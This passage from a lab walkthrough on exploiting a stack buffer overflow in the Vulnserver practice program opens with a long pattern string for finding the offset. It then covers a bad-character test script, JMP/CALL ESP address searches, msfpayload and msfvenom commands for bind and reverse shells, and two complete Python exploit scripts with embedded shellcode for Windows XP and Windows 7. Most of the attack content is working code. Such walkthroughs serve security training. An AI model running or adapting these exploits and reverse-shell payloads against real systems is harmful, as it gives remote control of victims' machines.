i4Ci5Ci6Ci7Ci8Ci9Cj0Cj1Cj2Cj3Cj4Cj5Cj6Cj7Cj8Cj9Ck0Ck1Ck2Ck3Ck4Ck5Ck6Ck7Ck8Ck9Cl0Cl1Cl2Cl3Cl4Cl5Cl6Cl7Cl8Cl9Cm0Cm1Cm2Cm3Cm4Cm5Cm6Cm7Cm8Cm9Cn0Cn1Cn2Cn3Cn4Cn5Cn6Cn7Cn8Cn9Co0Co1Co2Co3Co4Co5Co6Co7Co8Co9Cp0Cp1Cp2Cp3Cp4Cp5Cp6Cp7Cp8Cp9Cq0Cq1Cq2Cq3Cq4Cq5Cq6Cq7Cq8Cq9Cr0Cr1Cr2Cr3Cr4Cr5Cr6Cr7Cr8Cr9Cs0Cs1Cs2Cs3Cs4Cs5Cs6Cs7Cs8Cs9Ct0Ct1Ct2Ct3Ct4Ct5Ct6Ct7Ct8Ct9Cu0Cu1Cu2Cu3Cu4Cu5Cu6Cu7Cu8Cu9Cv0Cv1Cv2Cv3Cv4Cv5Cv6Cv7Cv8Cv9Cw0Cw1Cw2Cw3Cw4Cw5Cw6Cw7Cw8Cw9Cx0Cx1Cx2Cx3Cx4Cx5Cx6Cx7Cx8Cx9Cy0Cy1Cy2Cy3Cy4Cy5Cy6Cy7Cy8Cy9Cz0Cz1Cz2Cz3Cz4Cz5Cz6Cz7Cz8Cz9Da0Da1Da2Da3Da4Da5Da6Da7Da8Da9Db0Db1Db2Db3Db4Db5Db6Db7Db8Db9Dc0Dc1Dc2Dc3Dc4Dc5Dc6Dc7Dc8Dc9Dd0Dd1Dd2Dd3Dd4Dd5Dd6Dd7Dd8Dd9De0De1De2De3De4De5De6De7De8De9Df0Df1Df2Df3Df4Df5Df6Df7Df8Df9Dg0Dg1Dg2Dg3Dg4Dg5Dg6Dg7Dg8Dg9Dh0Dh1Dh2Dh3Dh4Dh5Dh6Dh7Dh8Dh9Di0Di1Di2Di3Di4Di5Di6Di7Di8Di9Dj0Dj1Dj2Dj3Dj4Dj5Dj6Dj7Dj8Dj9Dk0Dk1Dk2Dk3Dk4Dk5Dk6Dk7Dk8Dk9Dl0Dl1Dl2Dl3Dl4Dl5Dl6Dl7Dl8Dl9Dm0Dm1Dm2Dm3Dm4Dm5Dm6Dm7Dm8Dm9Dn0Dn1Dn2Dn3Dn4Dn5Dn6Dn7Dn8Dn9Do0Do1Do2Do3Do4Do5Do6Do7Do8Do9Dp0Dp1Dp2Dp3Dp4Dp5Dp6Dp7Dp8Dp9Dq0Dq1Dq2Dq3Dq4Dq5Dq6Dq7Dq8Dq9Dr0Dr1Dr2Dr3Dr4Dr5Dr6Dr7Dr8Dr9Ds0Ds1Ds2Ds3Ds4Ds5Ds6Ds7Ds8Ds9Dt0Dt1Dt2Dt3Dt4Dt5Dt6Dt7Dt8Dt9Du0Du1Du2Du3Du4Du5Du6Du7Du8Du9Dv0Dv1Dv2Dv3Dv4Dv5Dv6Dv7Dv8Dv9Dw0Dw1Dw2Dw3Dw4Dw5Dw6Dw7Dw8Dw9Dx0Dx1Dx2Dx3Dx4Dx5Dx6Dx7Dx8Dx9Dy0Dy1Dy2Dy3Dy4Dy5Dy6Dy7Dy8Dy9Dz0Dz1Dz2Dz3Dz4Dz5Dz6Dz7Dz8Dz9Ea0Ea1Ea2Ea3Ea4Ea5Ea6Ea7Ea8Ea9Eb0Eb1Eb2Eb3Eb4Eb5Eb6Eb7Eb8Eb9Ec0Ec1Ec2Ec3Ec4Ec5Ec6Ec7Ec8Ec9Ed0Ed1Ed2Ed3Ed4Ed5Ed6Ed7Ed8Ed9Ee0Ee1Ee2Ee3Ee4Ee5Ee6Ee7Ee8Ee9Ef0Ef1Ef2Ef3Ef4Ef5Ef6Ef7Ef8Ef9Eg0Eg1Eg2Eg3Eg4Eg5Eg6Eg7Eg8Eg9Eh0Eh1Eh2Eh3Eh4Eh5Eh6Eh7Eh8Eh9Ei0Ei1Ei2Ei3Ei4Ei5Ei6Ei7Ei8Ei9Ej0Ej1Ej2Ej3Ej4Ej5Ej6Ej7Ej8Ej9Ek0Ek1Ek2Ek3Ek4Ek5Ek6Ek7Ek8Ek9El0El1El2El3El4El5El6El7El8El9Em0Em1Em2Em3Em4Em5Em6Em7Em8Em9En0En1En2En3En4En5En6En7En8En9Eo0Eo1Eo2Eo3Eo4Eo5Eo6Eo7Eo8Eo9Ep0Ep1Ep2Ep3Ep4Ep5Ep6Ep7Ep8Ep9Eq0Eq1Eq2Eq3Eq4Eq5Eq6Eq7Eq8Eq9Er0Er1Er2Er3Er4Er5Er6Er7Er8Er9Es0Es1Es2Es3Es4Es5Es6Es7Es8Es9Et0Et1Et2Et3Et4Et5Et6Et7Et8Et9Eu0Eu1Eu2Eu3Eu4Eu5Eu6Eu7Eu8Eu9Ev0Ev1Ev2Ev3Ev4Ev5Ev6Ev7Ev8Ev9Ew0Ew1Ew2Ew3Ew4Ew5Ew6Ew7Ew8Ew9Ex0Ex1Ex2Ex3Ex4Ex5Ex6Ex7Ex8Ex9Ey0Ey1Ey2Ey3Ey4Ey5Ey6Ey7Ey8Ey9Ez0Ez1Ez2Ez3Ez4Ez5Ez6Ez7Ez8Ez9Fa0Fa1Fa2Fa3Fa4Fa5Fa6Fa7Fa8Fa9Fb0Fb1Fb2Fb3Fb4Fb5Fb6Fb7Fb8Fb9Fc0Fc1Fc2Fc3Fc4Fc5Fc6Fc7Fc8Fc9Fd0Fd1Fd2Fd3Fd4Fd5Fd6Fd7Fd8Fd9Fe0Fe1Fe2Fe3Fe4Fe5Fe6Fe7Fe8Fe9Ff0Ff1Ff2Ff3Ff4Ff5Ff6Ff7Ff8Ff9Fg0Fg1Fg2Fg3Fg4Fg5Fg6Fg7Fg8Fg9Fh0Fh1Fh2Fh3Fh4Fh5Fh6Fh7Fh8Fh9Fi0Fi1Fi2Fi3Fi4Fi5Fi6Fi7Fi8Fi9Fj0Fj1Fj2Fj3Fj4Fj5Fj6Fj7Fj8Fj9Fk0Fk1Fk2Fk3Fk4Fk5Fk6Fk7Fk8Fk9Fl0Fl1Fl2Fl3Fl4Fl5Fl6Fl7Fl8Fl9Fm0Fm1Fm2Fm3Fm4Fm5Fm6Fm7Fm8Fm9Fn0Fn1Fn2Fn3Fn4Fn5Fn6Fn7Fn8Fn9Fo0Fo1Fo2Fo3Fo4Fo5Fo6Fo7Fo8Fo9Fp0Fp1Fp2Fp3Fp4Fp5Fp6Fp7Fp8Fp9Fq0Fq1Fq2Fq3Fq4Fq5Fq6Fq7Fq8Fq9Fr0Fr1Fr2Fr3Fr4Fr5Fr6Fr7Fr8Fr9Fs0Fs1Fs2Fs3Fs4Fs5Fs6Fs7Fs8Fs9Ft0Ft1Ft2Ft3Ft4Ft5Ft6Ft7Ft8Ft9Fu0Fu1Fu2Fu3Fu4Fu5Fu6Fu7Fu8Fu9Fv0Fv1Fv2Fv3Fv4Fv5Fv6Fv7Fv8Fv9Fw0Fw1Fw2Fw3Fw4Fw5Fw6Fw7Fw8Fw9Fx0Fx1Fx2Fx3Fx4Fx5Fx6Fx7Fx8Fx9Fy0Fy1Fy2Fy3Fy4Fy5Fy6Fy7Fy8Fy9Fz0Fz1Fz2Fz3Fz4Fz5Fz6Fz7Fz8Fz9Ga0Ga1Ga2Ga3Ga4Ga5Ga6Ga7Ga8Ga9Gb0Gb1Gb2Gb3Gb4Gb5Gb6Gb7Gb8Gb9Gc0Gc1Gc2Gc3Gc4Gc5Gc6Gc7Gc8Gc9Gd0Gd1Gd2Gd3Gd4Gd5Gd6Gd7Gd8Gd9Ge0Ge1Ge2Ge3Ge4Ge5Ge6Ge7Ge8Ge9Gf0Gf1Gf2Gf3Gf4Gf5Gf6Gf7Gf8Gf9Gg0Gg1Gg2Gg3Gg4Gg5Gg6Gg7Gg8Gg9Gh0Gh1Gh2Gh3Gh4Gh5Gh6Gh7Gh8Gh9Gi0Gi1Gi2Gi3Gi4Gi5Gi6Gi7Gi8Gi9Gj0Gj1Gj2Gj3Gj4Gj5Gj6Gj7Gj8Gj9Gk0Gk1Gk2Gk3Gk4Gk5Gk6Gk7Gk8Gk9Gl0Gl1Gl2Gl3Gl4Gl5Gl6Gl7Gl8Gl9Gm0Gm1Gm2G
3. After we determine the offset we have to determine the bad characters in our case the \x00
We use this script below to determine a bad char:
#!/usr/bin/python
import socket
server = '192.168.1.26'
sport = 9999
prefix = 'A' * 2006
eip = 'BCDE'
testchars = ''
for i in range(0, 256):
testchars += chr(i)
padding = 'F' * (3000 - 2006 - 4 - len(testchars))
attack = prefix + eip + testchars + padding
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect = s.connect((server, sport))
print s.recv(1024)
print "Sending attack to TRUN . with length ", len(attack)
s.send(('TRUN .' + attack + '\r\n'))
print s.recv(1024)
s.send('EXIT\r\n')
print s.recv(1024)
s.close()
When we tests with the \x00 we get an access violation at 45444342 the last that we get written is BCDE - so \x00 is a bad char.
To skip \x00 we change the range of characters to (1,256). I saw that after skipping the bad char there were chars going to the stack.
4. We will need to jump to an ESP register where we can inject our exploitation code.
For XP I used findjmp to find a ESP that is directly to KERNEL32.DLL:
https://github.com/nickvido/littleoldearthquake/tree/master/corelan/findjmp/findjmp/bin
Both USER32 and KERNEL32 are usable:
#findjmp KERNEL32.DLL esp
#findjmp USER32.DLL esp
#Scanning KERNEL32 for code useable with the esp register
#0x7C8369F0 call esp
#0x7C86467B jmp esp
#0x7C868667 call esp <- will use this one
#Finished Scanning KERNEL32 for code useable with the esp register
For Windows 7 I used mona to find an ESP in essfunc.dll since it is not ASLR protected:
!mona find -s "\xff\xe4" -m essfunc.dll
5. The payload:
For Windows XP I used a bind shell, this did not work on Windows 7:
#/usr/share/framework2
./msfpayload win32_bind LPORT=1313 R | ./msfencode -b "\x00"
For Windows 7 I determined that the working variant was a reverse shell with msfvenom:
#msfvenom -p windows/shell_reverse_tcp LHOST="192.168.1.15" LPORT=4444 -f c -a x86 -b '\x00'
import socket
#SER_ADDR = input('Type the server IP address: ')
#SER_PORT = int(input('Type the server port: '))
SER_ADDR = '192.168.1.27'
SER_PORT = 9999
my_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
my_sock.connect((SER_ADDR, SER_PORT))
print('Connection established')
data = my_sock.recv(1024)
#Possible Registers for usage on XP SP3
#https://github.com/nickvido/littleoldearthquake/tree/master/corelan/findjmp/findjmp/bin
#findjmp KERNEL32.DLL esp
#findjmp USER32.DLL esp
#Scanning KERNEL32 for code useable with the esp register
#0x7C8369F0 call esp
#0x7C86467B jmp esp
#0x7C868667 call esp <- will use this one
#Finished Scanning KERNEL32 for code useable with the esp register
message = '\x41' * 2006 + '\x67\x86\x86\x7c' #CALL ESP that we chose
message += '\x90' * 16
#/usr/share/framework2
#./msfpayload win32_bind LPORT=1313 R | ./msfencode -b "\x00"
message +=(
"\x6a\x50\x59\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xef\x4d\x96"
"\x95\x83\xeb\xfc\xe2\xf4\x13\x27\x7d\xd8\x07\xb4\x69\x6a\x10\x2d"
"\x1d\xf9\xcb\x69\x1d\xd0\xd3\xc6\xea\x90\x97\x4c\x79\x1e\xa0\x55"
"\x1d\xca\xcf\x4c\x7d\xdc\x64\x79\x1d\x94\x01\x7c\x56\x0c\x43\xc9"
"\x56\xe1\xe8\x8c\x5c\x98\xee\x8f\x7d\x61\xd4\x19\xb2\xbd\x9a\xa8"
"\x1d\xca\xcb\x4c\x7d\xf3\x64\x41\xdd\x1e\xb0\x51\x97\x7e\xec\x61"
"\x1d\x1c\x83\x69\x8a\xf4\x2c\x7c\x4d\xf1\x64\x0e\xa6\x1e\xaf\x41"
"\x1d\xe5\xf3\xe0\x1d\xd5\xe7\x13\xfe\x1b\xa1\x43\x7a\xc5\x10\x9b"
"\xf0\xc6\x89\x25\xa5\xa7\x87\x3a\xe5\xa7\xb0\x19\x69\x45\x87\x86"
"\x7b\x69\xd4\x1d\x69\x43\xb0\xc4\x73\xf3\x6e\xa0\x9e\x97\xba\x27"
"\x94\x6a\x3f\x25\x4f\x9c\x1a\xe0\xc1\x6a\x39\x1e\xc5\xc6\xbc\x1e"
"\xd5\xc6\xac\x1e\x69\x45\x89\x25\x93\xb4\x89\x1e\x1f\x74\x7a\x25"
"\x32\x8f\x9f\x8a\xc1\x6a\x39\x27\x86\xc4\xba\xb2\x46\xfd\x4b\xe0"
"\xb8\x7c\xb8\xb2\x40\xc6\xba\xb2\x46\xfd\x0a\x04\x10\xdc\xb8\xb2"
"\x40\xc5\xbb\x19\xc3\x6a\x3f\xde\xfe\x72\x96\x8b\xef\xc2\x10\x9b"
"\xc3\x6a\x3f\x2b\xfc\xf1\x89\x25\xf5\xf8\x66\xa8\xfc\xc5\xb6\x64"
"\x5a\x1c\x08\x27\xd2\x1c\x0d\x7c\x56\x66\x45\xb3\xd4\xb8\x11\x0f"
"\xba\x06\x62\x37\xae\x3e\x44\xe6\xfe\xe7\x11\xfe\x80\x6a\x9a\x09"
"\x69\x43\xb4\x1a\xc4\xc4\xbe\x1c\xfc\x94\xbe\x1c\xc3\xc4\x10\x9d"
"\xfe\x38\x36\x48\x58\xc6\x10\x9b\xfc\x6a\x10\x7a\x69\x45\x64\x1a"
"\x6a\x16\x2b\x29\x69\x43\xbd\xb2\x46\xfd\x1f\xc7\x92\xca\xbc\xb2"
"\x40\x6a\x3f\x4d\x96\x95")
my_sock.send(('TRUN .' + message + '\r\n'))
print my_sock.recv(1024)
my_sock.send('EXIT\r\n')
print my_sock.recv(1024)
my_sock.close()
Exploit for Vulnserver on Windows 7:
import socket
#SER_ADDR = input('Type the server IP address: ')
#SER_PORT = int(input('Type the server port: '))
SER_ADDR = '192.168.1.26'
SER_PORT = 9999
my_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
my_sock.connect((SER_ADDR, SER_PORT))
print('Connection established')
data = my_sock.recv(1024)
prefix = '\x41' * 2006
esp = '\xaf\x11\x50\x62' #CALL ESP that we chose
nopsled = '\x90' * 16
#!mona find -s "\xff\xe4" -m essfunc.dll
#msfvenom -p windows/shell_reverse_tcp LHOST="192.168.1.15" LPORT=4444 -f c -a x86 -b '\x00' <-works
payload =(
"\xdd\xc5\xd9\x74\x24\xf4\xb8\x84\x6e\x28\xf3\x5a\x33\xc9\xb1"
"\x52\x31\x42\x17\x03\x42\x17\x83\x46\x6a\xca\x06\xba\x9b\x88"
"\xe9\x42\x5c\xed\x60\xa7\x6d\x2d\x16\xac\xde\x9d\x5c\xe0\xd2"
"\x56\x30\x10\x60\x1a\x9d\x17\xc1\x91\xfb\x16\xd2\x8a\x38\x39"
"\x50\xd1\x6c\x99\x69\x1a\x61\xd8\xae\x47\x88\x88\x67\x03\x3f"
"\x3c\x03\x59\xfc\xb7\x5f\x4f\x84\x24\x17\x6e\xa5\xfb\x23\x29"
"\x65\xfa\xe0\x41\x2c\xe4\xe5\x6c\xe6\x9f\xde\x1b\xf9\x49\x2f"
"\xe3\x56\xb4\x9f\x16\xa6\xf1\x18\xc9\xdd\x0b\x5b\x74\xe6\xc8"
"\x21\xa2\x63\xca\x82\x21\xd3\x36\x32\xe5\x82\xbd\x38\x42\xc0"
"\x99\x5c\x55\x05\x92\x59\xde\xa8\x74\xe8\xa4\x8e\x50\xb0\x7f"
"\xae\xc1\x1c\xd1\xcf\x11\xff\x8e\x75\x5a\x12\xda\x07\x01\x7b"
"\x2f\x2a\xb9\x7b\x27\x3d\xca\x49\xe8\x95\x44\xe2\x61\x30\x93"
"\x05\x58\x84\x0b\xf8\x63\xf5\x02\x3f\x37\xa5\x3c\x96\x38\x2e"
"\xbc\x17\xed\xe1\xec\xb7\x5e\x42\x5c\x78\x0f\x2a\xb6\x77\x70"
"\x4a\xb9\x5d\x19\xe1\x40\x36\xe6\x5e\x4b\xc9\x8e\x9c\x4b\xc4"
"\x12\x28\xad\x8c\xba\x7c\x66\x39\x22\x25\xfc\xd8\xab\xf3\x79"
"\xda\x20\xf0\x7e\x95\xc0\x7d\x6c\x42\x21\xc8\xce\xc5\x3e\xe6"
"\x66\x89\xad\x6d\x76\xc4\xcd\x39\x21\x81\x20\x30\xa7\x3f\x1a"
"\xea\xd5\xbd\xfa\xd5\x5d\x1a\x3f\xdb\x5c\xef\x7b\xff\x4e\x29"
"\x83\xbb\x3a\xe5\xd2\x15\x94\x43\x8d\xd7\x4e\x1a\x62\xbe\x06"
"\xdb\x48\x01\x50\xe4\x84\xf7\xbc\x55\x71\x4e\xc3\x5a\x15\x46"
"\xbc\x86\x85\xa9\x17\x03\xb5\xe3\x35\x22\x5e\xaa\xac\x76\x03"
"\x4d\x1b\xb4\x3a\xce\xa9\x45\xb9\xce\xd8\x40\x85\x48\x31\x39"
"\x96\x3c\x35\xee\x97\x14"
)
message = prefix + esp + nopsled + payload + 'C' * (3000-len(prefix)-len(esp)-len(nopsled)-len(payload))
my_sock.send(('TRUN .' + message + '\r\n'))
print my_sock.recv(1024)
my_sock.send('EXIT\r\n')
print my_sock.recv(1024)
my_sock.close()
